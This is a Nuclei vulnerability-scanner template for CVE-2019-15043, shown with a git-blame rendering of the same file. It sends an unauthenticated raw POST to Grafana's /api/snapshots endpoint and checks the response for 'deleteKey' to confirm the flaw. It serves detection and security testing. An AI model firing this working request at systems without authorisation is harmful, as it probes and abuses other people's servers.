nuclei-templates/cves/2019/CVE-2019-15043.yaml

id: CVE-2019-15043
info:
  author: bing0o
  name: Grafana unauthenticated API
  severity: medium
  description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.
  reference: |
    - https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/
    - https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569	Vendor Advisory
    - https://community.grafana.com/t/release-notes-v6-3-x/19202
  tags: cve,cve2019,grafana

requests:
  - raw:
      - |
        POST /api/snapshots HTTP/1.1
        Host: {{Hostname}}
        Connection: close
        Content-Length: 235
        Accept: */*
        Accept-Language: en
        Content-Type: application/json

        {"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}

    matchers:
      - part: body
        type: word
        words:
          - deleteKey
misc changes 2021-01-02 04:59:06 +00:00			`id: CVE-2019-15043`
Create CVE-2019-15043.yaml 2020-07-04 13:05:56 +00:00			`info:`
			`author: bing0o`
			`name: Grafana unauthenticated API`
			`severity: medium`
Description 2021-03-30 06:50:02 +00:00			`description: In Grafana 2.x through 6.x before 6.3.4, parts of the HTTP API allow unauthenticated use. This makes it possible to run a denial of service attack against the server running Grafana.`
			`reference: \|`
			`- https://grafana.com/blog/2019/08/29/grafana-5.4.5-and-6.3.4-released-with-important-security-fix/`
			`- https://community.grafana.com/t/grafana-5-4-5-and-6-3-4-security-update/20569 Vendor Advisory`
			`- https://community.grafana.com/t/release-notes-v6-3-x/19202`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`tags: cve,cve2019,grafana`

Create CVE-2019-15043.yaml 2020-07-04 13:05:56 +00:00			`requests:`
Added tags to cves :sunglasses: (#813) * Added tags to cves :sunglasses: 2021-02-05 19:44:41 +00:00			`- raw:`
			`- \|`
			`POST /api/snapshots HTTP/1.1`
			`Host: {{Hostname}}`
			`Connection: close`
			`Content-Length: 235`
			`Accept: /`
			`Accept-Language: en`
			`Content-Type: application/json`

			`{"dashboard": {"editable":false,"hideControls":true,"nav":[{"enable":false,"type":"timepicker"}],"rows": [{}],"style":"dark","tags":[],"templating":{"list":[]},"time":{},"timezone":"browser","title":"Home","version":5},"expires": 3600}`

Create CVE-2019-15043.yaml 2020-07-04 13:05:56 +00:00			`matchers:`
			`- part: body`
			`type: word`
			`words:`
			`- deleteKey`